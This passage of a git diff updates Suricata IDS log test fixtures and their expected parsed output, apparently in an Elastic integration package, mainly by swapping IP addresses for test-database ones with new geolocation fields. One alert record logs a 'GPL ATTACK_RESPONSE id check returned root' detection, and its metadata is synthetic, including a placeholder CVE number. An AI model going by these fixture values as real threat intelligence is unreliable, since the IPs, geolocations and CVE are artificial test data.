\"175.16.199.1\"}]}}", "category": [ "network" ], @@ -1813,10 +1806,10 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "2a04:4e42:0000:0000:0000:0000:0000:0729", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "2a04:4e42:0200:0000:0000:0000:0000:0729", "2a04:4e42:0400:0000:0000:0000:0000:0729", - "2a04:4e42:0600:0000:0000:0000:0000:0729" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ], "question": { "name": "www.elastic.co", @@ -1834,7 +1827,7 @@ }, { "name": "dualstack.r2.shared.global.fastly.net", - "data": "2a04:4e42:0000:0000:0000:0000:0000:0729", + "data": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "AAAA", "ttl": 29 }, @@ -1852,7 +1845,7 @@ }, { "name": "dualstack.r2.shared.global.fastly.net", - "data": "2a04:4e42:0600:0000:0000:0000:0000:0729", + "data": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "AAAA", "ttl": 29 } @@ -1882,10 +1875,9 @@ }, "related": { "ip": [ - "2a04:4e42:0000:0000:0000:0000:0000:0729", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "2a04:4e42:0200:0000:0000:0000:0000:0729", "2a04:4e42:0400:0000:0000:0000:0000:0729", - "2a04:4e42:0600:0000:0000:0000:0000:0729", "10.0.2.3" ] }, @@ -1904,8 +1896,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853524400Z", - "original": "{\"timestamp\":\"2019-08-23T02:03:36.626559+0000\",\"flow_id\":928596784370390,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":59203,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":12859,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.elastic.co\",\"rrtype\":\"AAAA\",\"answers\":[{\"rrname\":\"www.elastic.co\",\"rrtype\":\"CNAME\",\"ttl\":269,\"rdata\":\"dualstack.r2.shared.global.fastly.net\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0000:0000:0000:0000:0000:0729\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0200:0000:0000:0000:0000:0729\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0400:0000:0000:0000:0000:0729\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0600:0000:0000:0000:0000:0729\"}]}}", + "ingested": "2021-12-09T13:45:26.598028100Z", + "original": "{\"timestamp\":\"2019-08-23T02:03:36.626559+0000\",\"flow_id\":928596784370390,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":59203,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":12859,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.elastic.co\",\"rrtype\":\"AAAA\",\"answers\":[{\"rrname\":\"www.elastic.co\",\"rrtype\":\"CNAME\",\"ttl\":269,\"rdata\":\"dualstack.r2.shared.global.fastly.net\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0200:0000:0000:0000:0000:0729\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0400:0000:0000:0000:0000:0729\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"}]}}", "category": [ "network" ], diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-metadata.log b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-metadata.log index 8c8eb1eca60..d900dbcd4a0 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-metadata.log +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-metadata.log @@ -1 +1 @@ -{"timestamp":"2021-01-27T01:28:11.488362+0100","flow_id":1805461738637437,"in_iface":"enp6s0","event_type":"alert","src_ip":"52.222.141.99","src_port":80,"dest_ip":"10.31.64.240","dest_port":47592,"proto":"TCP","ether":{"src_mac":"00:03:2d:3f:e5:63","dest_mac":"00:1b:17:00:01:18"},"alert":{"action":"allowed","gid":1,"signature_id":2100498,"rev":7,"signature":"GPL ATTACK_RESPONSE id check returned root","category":"Potentially Bad Traffic","severity":2,"metadata":{"protocols":["tcp","smtp"],"mitre_attack":["t1190"],"cvss_v2_temporal":["7.9"],"cve":["2019-91325"],"cvss_v3_temporal":["7.1"],"attack_target":["smtp-server","server"],"cvss_v2_base":["8.1"],"rule_source":["acme-rule-factory"],"priority":["medium"],"filename":["exploit.rules"],"updated_at":["2019-06-11"],"capec_id":["248"],"created_at":["2019-06-01"],"hostile":["src_ip"],"cvss_v3_base":["7.3"],"cwe_id":["20"]}},"http":{"hostname":"testmynids.org","url":"/uid/index.html","http_user_agent":"curl/7.58.0","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":200,"length":39},"app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":496,"bytes_toclient":876,"start":"2021-01-22T23:28:38.673917+0100"}} \ No newline at end of file +{"timestamp":"2021-01-27T01:28:11.488362+0100","flow_id":1805461738637437,"in_iface":"enp6s0","event_type":"alert","src_ip":"175.16.199.1","src_port":80,"dest_ip":"10.31.64.240","dest_port":47592,"proto":"TCP","ether":{"src_mac":"00:03:2d:3f:e5:63","dest_mac":"00:1b:17:00:01:18"},"alert":{"action":"allowed","gid":1,"signature_id":2100498,"rev":7,"signature":"GPL ATTACK_RESPONSE id check returned root","category":"Potentially Bad Traffic","severity":2,"metadata":{"protocols":["tcp","smtp"],"mitre_attack":["t1190"],"cvss_v2_temporal":["7.9"],"cve":["2019-91325"],"cvss_v3_temporal":["7.1"],"attack_target":["smtp-server","server"],"cvss_v2_base":["8.1"],"rule_source":["acme-rule-factory"],"priority":["medium"],"filename":["exploit.rules"],"updated_at":["2019-06-11"],"capec_id":["248"],"created_at":["2019-06-01"],"hostile":["src_ip"],"cvss_v3_base":["7.3"],"cwe_id":["20"]}},"http":{"hostname":"testmynids.org","url":"/uid/index.html","http_user_agent":"curl/7.58.0","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":200,"length":39},"app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":496,"bytes_toclient":876,"start":"2021-01-22T23:28:38.673917+0100"}} \ No newline at end of file diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-metadata.log-expected.json b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-metadata.log-expected.json index 8f2d5ed5c4a..9d0d9645126 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-metadata.log-expected.json +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-metadata.log-expected.json @@ -16,21 +16,26 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -122.3451, - "lat": 47.6348 + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "52.222.141.99", + "address": "175.16.199.1", "port": 80, "bytes": 496, - "ip": "52.222.141.99", + "ip": "175.16.199.1", "mac": "00:03:2d:3f:e5:63", "packets": 6 }, @@ -63,7 +68,7 @@ "testmynids.org" ], "ip": [ - "52.222.141.99" + "175.16.199.1" ] }, "http": { @@ -146,8 +151,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-05T10:52:45.879863300Z", - "original": "{\"timestamp\":\"2021-01-27T01:28:11.488362+0100\",\"flow_id\":1805461738637437,\"in_iface\":\"enp6s0\",\"event_type\":\"alert\",\"src_ip\":\"52.222.141.99\",\"src_port\":80,\"dest_ip\":\"10.31.64.240\",\"dest_port\":47592,\"proto\":\"TCP\",\"ether\":{\"src_mac\":\"00:03:2d:3f:e5:63\",\"dest_mac\":\"00:1b:17:00:01:18\"},\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2100498,\"rev\":7,\"signature\":\"GPL ATTACK_RESPONSE id check returned root\",\"category\":\"Potentially Bad Traffic\",\"severity\":2,\"metadata\":{\"protocols\":[\"tcp\",\"smtp\"],\"mitre_attack\":[\"t1190\"],\"cvss_v2_temporal\":[\"7.9\"],\"cve\":[\"2019-91325\"],\"cvss_v3_temporal\":[\"7.1\"],\"attack_target\":[\"smtp-server\",\"server\"],\"cvss_v2_base\":[\"8.1\"],\"rule_source\":[\"acme-rule-factory\"],\"priority\":[\"medium\"],\"filename\":[\"exploit.rules\"],\"updated_at\":[\"2019-06-11\"],\"capec_id\":[\"248\"],\"created_at\":[\"2019-06-01\"],\"hostile\":[\"src_ip\"],\"cvss_v3_base\":[\"7.3\"],\"cwe_id\":[\"20\"]}},\"http\":{\"hostname\":\"testmynids.org\",\"url\":\"/uid/index.html\",\"http_user_agent\":\"curl/7.58.0\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":200,\"length\":39},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":6,\"pkts_toclient\":5,\"bytes_toserver\":496,\"bytes_toclient\":876,\"start\":\"2021-01-22T23:28:38.673917+0100\"}}", + "ingested": "2021-12-09T13:45:29.262566900Z", + "original": "{\"timestamp\":\"2021-01-27T01:28:11.488362+0100\",\"flow_id\":1805461738637437,\"in_iface\":\"enp6s0\",\"event_type\":\"alert\",\"src_ip\":\"175.16.199.1\",\"src_port\":80,\"dest_ip\":\"10.31.64.240\",\"dest_port\":47592,\"proto\":\"TCP\",\"ether\":{\"src_mac\":\"00:03:2d:3f:e5:63\",\"dest_mac\":\"00:1b:17:00:01:18\"},\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2100498,\"rev\":7,\"signature\":\"GPL ATTACK_RESPONSE id check returned root\",\"category\":\"Potentially Bad Traffic\",\"severity\":2,\"metadata\":{\"protocols\":[\"tcp\",\"smtp\"],\"mitre_attack\":[\"t1190\"],\"cvss_v2_temporal\":[\"7.9\"],\"cve\":[\"2019-91325\"],\"cvss_v3_temporal\":[\"7.1\"],\"attack_target\":[\"smtp-server\",\"server\"],\"cvss_v2_base\":[\"8.1\"],\"rule_source\":[\"acme-rule-factory\"],\"priority\":[\"medium\"],\"filename\":[\"exploit.rules\"],\"updated_at\":[\"2019-06-11\"],\"capec_id\":[\"248\"],\"created_at\":[\"2019-06-01\"],\"hostile\":[\"src_ip\"],\"cvss_v3_base\":[\"7.3\"],\"cwe_id\":[\"20\"]}},\"http\":{\"hostname\":\"testmynids.org\",\"url\":\"/uid/index.html\",\"http_user_agent\":\"curl/7.58.0\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":200,\"length\":39},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":6,\"pkts_toclient\":5,\"bytes_toserver\":496,\"bytes_toclient\":876,\"start\":\"2021-01-22T23:28:38.673917+0100\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", "start": "2021-01-22T22:28:38.673Z", diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-small.log b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-small.log index 9cc157a9e75..bf46d429aa4 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-small.log +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-small.log @@ -2,7 +2,7 @@ {"timestamp":"2018-07-05T15:07:20.910626-0400","flow_id":904992230150281,"in_iface":"en0","event_type":"alert","src_ip":"192.168.86.85","src_port":55641,"dest_ip":"192.168.156.70","dest_port":443,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2024833,"rev":3,"signature":"ET POLICY Observed IP Lookup Domain (l2 .io in TLS SNI)","category":"Potential Corporate Privacy Violation","severity":1},"tls":{"session_resumed":true,"sni":"l2.io","version":"TLS 1.2"},"app_proto":"tls","flow":{"pkts_toserver":4,"pkts_toclient":3,"bytes_toserver":793,"bytes_toclient":343,"start":"2018-07-05T15:07:19.659593-0400"}} {"timestamp":"2018-07-05T15:43:47.690014-0400","flow_id":2115002772430095,"in_iface":"en0","event_type":"http","src_ip":"192.168.86.85","src_port":56119,"dest_ip":"192.168.86.28","dest_port":63963,"proto":"TCP","tx_id":0,"http":{"hostname":"192.168.86.28","url":"\/dd.xml","http_user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/67.0.3396.99 Safari\/537.36","http_content_type":"text\/xml","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1155}} {"timestamp":"2018-07-05T15:44:33.222441-0400","flow_id":2211411903323127,"in_iface":"en0","event_type":"fileinfo","src_ip":"192.168.86.28","src_port":8008,"dest_ip":"192.168.86.85","dest_port":56118,"proto":"TCP","http":{"hostname":"192.168.86.28","url":"\/ssdp\/device-desc.xml","http_user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/67.0.3396.99 Safari\/537.36","http_content_type":"application\/xml","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1071},"app_proto":"http","fileinfo":{"filename":"\/ssdp\/device-desc.xml","gaps":false,"state":"CLOSED","md5":"427b7337ff37eeb24d74f47d8e04cf21","sha1":"313573490192c685e9e53abef25453ed0d5e2aee","sha256":"f610428ebddf6f8cf9e39322e672583c45fcdcf885efad0ab48fd53a3dfc2c4b","stored":false,"size":1071,"tx_id":0}} -{"timestamp":"2018-07-05T15:51:20.213418-0400","flow_id":1684780223079543,"in_iface":"en0","event_type":"dns","src_ip":"192.168.86.1","src_port":53,"dest_ip":"192.168.86.85","dest_port":39464,"proto":"UDP","dns":{"type":"answer","id":12308,"rcode":"NOERROR","rrname":"clients.l.google.com","rrtype":"A","ttl":299,"rdata":"172.217.13.110"}} +{"timestamp":"2018-07-05T15:51:20.213418-0400","flow_id":1684780223079543,"in_iface":"en0","event_type":"dns","src_ip":"192.168.86.1","src_port":53,"dest_ip":"192.168.86.85","dest_port":39464,"proto":"UDP","dns":{"type":"answer","id":12308,"rcode":"NOERROR","rrname":"clients.l.google.com","rrtype":"A","ttl":299,"rdata":"175.16.199.1"}} {"timestamp":"2018-07-05T15:51:23.009510-0400","event_type":"stats","stats":{"uptime":5400,"capture":{"kernel_packets":430313,"kernel_drops":0,"kernel_ifdrops":0},"decoder":{"pkts":430313,"bytes":335138381,"invalid":2,"ipv4":425873,"ipv6":3785,"ethernet":430313,"raw":0,"null":0,"sll":0,"tcp":370093,"udp":58337,"sctp":0,"icmpv4":186,"icmpv6":1019,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"ieee8021ah":0,"teredo":1,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":778,"max_pkt_size":1514,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"tcp":1113,"udp":1881,"icmpv4":0,"icmpv6":677,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":11537312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":842,"ssn_memcap_drop":0,"pseudo":0,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":1138,"synack":656,"rst":1165,"segment_memcap_drop":0,"stream_depth_reached":63,"reassembly_gap":0,"overlap":5979,"overlap_diff_data":0,"insert_data_normal_fail":0,"insert_data_overlap_fail":0,"insert_list_fail":0,"memuse":4587520,"reassembly_memuse":768000},"detect":{"alert":2},"app_layer":{"flow":{"http":22,"ftp":0,"smtp":0,"tls":560,"ssh":4,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":2,"dcerpc_udp":0,"dns_udp":762,"failed_udp":1119},"tx":{"http":25,"ftp":0,"smtp":0,"tls":0,"ssh":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"dcerpc_udp":0,"dns_udp":762}},"flow_mgr":{"closed_pruned":729,"new_pruned":1879,"est_pruned":975,"bypassed_pruned":0,"flows_checked":8,"flows_notimeout":8,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65530,"rows_empty":0,"rows_busy":0,"rows_maxlen":2},"file_store":{"open_files":0},"dns":{"memuse":7749,"memcap_state":0,"memcap_global":0},"http":{"memuse":17861,"memcap":0}}} {"timestamp":"2018-07-05T15:51:50.666597-0400","flow_id":89751777876473,"in_iface":"en0","event_type":"tls","src_ip":"192.168.86.85","src_port":56187,"dest_ip":"17.142.164.13","dest_port":443,"proto":"TCP","tls":{"subject":"CN=*.icloud.com, OU=management:idms.group.506364, O=Apple Inc., ST=California, C=US","issuerdn":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","serial":"5C:9C:E1:09:78:87:F8:07","fingerprint":"6a:ff:ac:a6:5f:8a:05:e7:a9:8c:76:29:b9:08:c7:69:ad:dc:72:47","sni":"p33-btmmdns.icloud.com.","version":"TLS 1.2","notbefore":"2017-02-27T17:54:31","notafter":"2019-03-29T17:54:31"}} {"timestamp":"2018-07-05T15:51:54.001329-0400","flow_id":1828507008887644,"event_type":"flow","src_ip":"fe80:0000:0000:0000:fada:0cff:fedc:87f1","src_port":546,"dest_ip":"ff02:0000:0000:0000:0000:0000:0001:0002","dest_port":547,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":0,"bytes_toserver":110,"bytes_toclient":0,"start":"2018-07-05T15:51:23.453468-0400","end":"2018-07-05T15:51:23.453468-0400","age":0,"state":"new","reason":"timeout","alerted":false}} diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-small.log-expected.json b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-small.log-expected.json index f06d26c8070..8da063a5247 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-small.log-expected.json +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-small.log-expected.json @@ -37,7 +37,7 @@ "ip": "192.168.86.85" }, "event": { - "ingested": "2021-07-05T10:52:45.978240900Z", + "ingested": "2021-12-09T13:45:29.680219800Z", "original": "{\"timestamp\":\"2018-07-05T15:01:09.820360-0400\",\"flow_id\":298824096901438,\"in_iface\":\"en0\",\"event_type\":\"ssh\",\"src_ip\":\"192.168.86.85\",\"src_port\":55406,\"dest_ip\":\"192.168.253.112\",\"dest_port\":22,\"proto\":\"TCP\",\"ssh\":{\"client\":{\"proto_version\":\"2.0\",\"software_version\":\"OpenSSH_7.6\"},\"server\":{\"proto_version\":\"2.0\",\"software_version\":\"libssh_0.7.0\"}}}", "category": [ "network" @@ -126,7 +126,7 @@ }, "event": { "severity": 1, - "ingested": "2021-07-05T10:52:45.978256300Z", + "ingested": "2021-12-09T13:45:29.680225600Z", "original": "{\"timestamp\":\"2018-07-05T15:07:20.910626-0400\",\"flow_id\":904992230150281,\"in_iface\":\"en0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.86.85\",\"src_port\":55641,\"dest_ip\":\"192.168.156.70\",\"dest_port\":443,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2024833,\"rev\":3,\"signature\":\"ET POLICY Observed IP Lookup Domain (l2 .io in TLS SNI)\",\"category\":\"Potential Corporate Privacy Violation\",\"severity\":1},\"tls\":{\"session_resumed\":true,\"sni\":\"l2.io\",\"version\":\"TLS 1.2\"},\"app_proto\":\"tls\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":793,\"bytes_toclient\":343,\"start\":\"2018-07-05T15:07:19.659593-0400\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -199,7 +199,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:45.978260300Z", + "ingested": "2021-12-09T13:45:29.680230400Z", "original": "{\"timestamp\":\"2018-07-05T15:43:47.690014-0400\",\"flow_id\":2115002772430095,\"in_iface\":\"en0\",\"event_type\":\"http\",\"src_ip\":\"192.168.86.85\",\"src_port\":56119,\"dest_ip\":\"192.168.86.28\",\"dest_port\":63963,\"proto\":\"TCP\",\"tx_id\":0,\"http\":{\"hostname\":\"192.168.86.28\",\"url\":\"\\/dd.xml\",\"http_user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\",\"http_content_type\":\"text\\/xml\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1155}}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -298,7 +298,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:45.978263600Z", + "ingested": "2021-12-09T13:45:29.680234200Z", "original": "{\"timestamp\":\"2018-07-05T15:44:33.222441-0400\",\"flow_id\":2211411903323127,\"in_iface\":\"en0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.86.28\",\"src_port\":8008,\"dest_ip\":\"192.168.86.85\",\"dest_port\":56118,\"proto\":\"TCP\",\"http\":{\"hostname\":\"192.168.86.28\",\"url\":\"\\/ssdp\\/device-desc.xml\",\"http_user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\",\"http_content_type\":\"application\\/xml\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1071},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/ssdp\\/device-desc.xml\",\"gaps\":false,\"state\":\"CLOSED\",\"md5\":\"427b7337ff37eeb24d74f47d8e04cf21\",\"sha1\":\"313573490192c685e9e53abef25453ed0d5e2aee\",\"sha256\":\"f610428ebddf6f8cf9e39322e672583c45fcdcf885efad0ab48fd53a3dfc2c4b\",\"stored\":false,\"size\":1071,\"tx_id\":0}}", "category": [ "network" @@ -329,14 +329,14 @@ "answers": [ { "name": "clients.l.google.com", - "data": "172.217.13.110", + "data": "175.16.199.1", "type": "A", "ttl": 299 } ], "response_code": "NOERROR", "resolved_ip": [ - "172.217.13.110" + "175.16.199.1" ], "id": "12308", "question": { @@ -364,7 +364,7 @@ }, "related": { "ip": [ - "172.217.13.110", + "175.16.199.1", "192.168.86.1" ] }, @@ -373,7 +373,7 @@ "in_iface": "en0", "dns": { "rrname": "clients.l.google.com", - "rdata": "172.217.13.110", + "rdata": "175.16.199.1", "rcode": "NOERROR", "id": 12308, "type": "answer", @@ -385,8 +385,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:45.978266600Z", - "original": "{\"timestamp\":\"2018-07-05T15:51:20.213418-0400\",\"flow_id\":1684780223079543,\"in_iface\":\"en0\",\"event_type\":\"dns\",\"src_ip\":\"192.168.86.1\",\"src_port\":53,\"dest_ip\":\"192.168.86.85\",\"dest_port\":39464,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":12308,\"rcode\":\"NOERROR\",\"rrname\":\"clients.l.google.com\",\"rrtype\":\"A\",\"ttl\":299,\"rdata\":\"172.217.13.110\"}}", + "ingested": "2021-12-09T13:45:29.680238700Z", + "original": "{\"timestamp\":\"2018-07-05T15:51:20.213418-0400\",\"flow_id\":1684780223079543,\"in_iface\":\"en0\",\"event_type\":\"dns\",\"src_ip\":\"192.168.86.1\",\"src_port\":53,\"dest_ip\":\"192.168.86.85\",\"dest_port\":39464,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":12308,\"rcode\":\"NOERROR\",\"rrname\":\"clients.l.google.com\",\"rrtype\":\"A\",\"ttl\":299,\"rdata\":\"175.16.199.1\"}}", "category": [ "network" ], @@ -562,7 +562,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:45.978269700Z", + "ingested": "2021-12-09T13:45:29.680244100Z", "original": "{\"timestamp\":\"2018-07-05T15:51:23.009510-0400\",\"event_type\":\"stats\",\"stats\":{\"uptime\":5400,\"capture\":{\"kernel_packets\":430313,\"kernel_drops\":0,\"kernel_ifdrops\":0},\"decoder\":{\"pkts\":430313,\"bytes\":335138381,\"invalid\":2,\"ipv4\":425873,\"ipv6\":3785,\"ethernet\":430313,\"raw\":0,\"null\":0,\"sll\":0,\"tcp\":370093,\"udp\":58337,\"sctp\":0,\"icmpv4\":186,\"icmpv6\":1019,\"ppp\":0,\"pppoe\":0,\"gre\":0,\"vlan\":0,\"vlan_qinq\":0,\"ieee8021ah\":0,\"teredo\":1,\"ipv4_in_ipv6\":0,\"ipv6_in_ipv6\":0,\"mpls\":0,\"avg_pkt_size\":778,\"max_pkt_size\":1514,\"erspan\":0,\"ipraw\":{\"invalid_ip_version\":0},\"ltnull\":{\"pkt_too_small\":0,\"unsupported_type\":0},\"dce\":{\"pkt_too_small\":0}},\"flow\":{\"memcap\":0,\"tcp\":1113,\"udp\":1881,\"icmpv4\":0,\"icmpv6\":677,\"spare\":10000,\"emerg_mode_entered\":0,\"emerg_mode_over\":0,\"tcp_reuse\":0,\"memuse\":11537312},\"defrag\":{\"ipv4\":{\"fragments\":0,\"reassembled\":0,\"timeouts\":0},\"ipv6\":{\"fragments\":0,\"reassembled\":0,\"timeouts\":0},\"max_frag_hits\":0},\"tcp\":{\"sessions\":842,\"ssn_memcap_drop\":0,\"pseudo\":0,\"pseudo_failed\":0,\"invalid_checksum\":0,\"no_flow\":0,\"syn\":1138,\"synack\":656,\"rst\":1165,\"segment_memcap_drop\":0,\"stream_depth_reached\":63,\"reassembly_gap\":0,\"overlap\":5979,\"overlap_diff_data\":0,\"insert_data_normal_fail\":0,\"insert_data_overlap_fail\":0,\"insert_list_fail\":0,\"memuse\":4587520,\"reassembly_memuse\":768000},\"detect\":{\"alert\":2},\"app_layer\":{\"flow\":{\"http\":22,\"ftp\":0,\"smtp\":0,\"tls\":560,\"ssh\":4,\"imap\":0,\"msn\":0,\"smb\":0,\"dcerpc_tcp\":0,\"dns_tcp\":0,\"failed_tcp\":2,\"dcerpc_udp\":0,\"dns_udp\":762,\"failed_udp\":1119},\"tx\":{\"http\":25,\"ftp\":0,\"smtp\":0,\"tls\":0,\"ssh\":0,\"smb\":0,\"dcerpc_tcp\":0,\"dns_tcp\":0,\"dcerpc_udp\":0,\"dns_udp\":762}},\"flow_mgr\":{\"closed_pruned\":729,\"new_pruned\":1879,\"est_pruned\":975,\"bypassed_pruned\":0,\"flows_checked\":8,\"flows_notimeout\":8,\"flows_timeout\":0,\"flows_timeout_inuse\":0,\"flows_removed\":0,\"rows_checked\":65536,\"rows_skipped\":65530,\"rows_empty\":0,\"rows_busy\":0,\"rows_maxlen\":2},\"file_store\":{\"open_files\":0},\"dns\":{\"memuse\":7749,\"memcap_state\":0,\"memcap_global\":0},\"http\":{\"memuse\":17861,\"memcap\":0}}}", "category": [ "network" @@ -656,7 +656,7 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-07-05T10:52:45.978272600Z", + "ingested": "2021-12-09T13:45:29.680248300Z", "original": "{\"timestamp\":\"2018-07-05T15:51:50.666597-0400\",\"flow_id\":89751777876473,\"in_iface\":\"en0\",\"event_type\":\"tls\",\"src_ip\":\"192.168.86.85\",\"src_port\":56187,\"dest_ip\":\"17.142.164.13\",\"dest_port\":443,\"proto\":\"TCP\",\"tls\":{\"subject\":\"CN=*.icloud.com, OU=management:idms.group.506364, O=Apple Inc., ST=California, C=US\",\"issuerdn\":\"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US\",\"serial\":\"5C:9C:E1:09:78:87:F8:07\",\"fingerprint\":\"6a:ff:ac:a6:5f:8a:05:e7:a9:8c:76:29:b9:08:c7:69:ad:dc:72:47\",\"sni\":\"p33-btmmdns.icloud.com.\",\"version\":\"TLS 1.2\",\"notbefore\":\"2017-02-27T17:54:31\",\"notafter\":\"2019-03-29T17:54:31\"}}", "category": [ "network" @@ -705,7 +705,7 @@ }, "event": { "duration": 0, - "ingested": "2021-07-05T10:52:45.978275500Z", + "ingested": 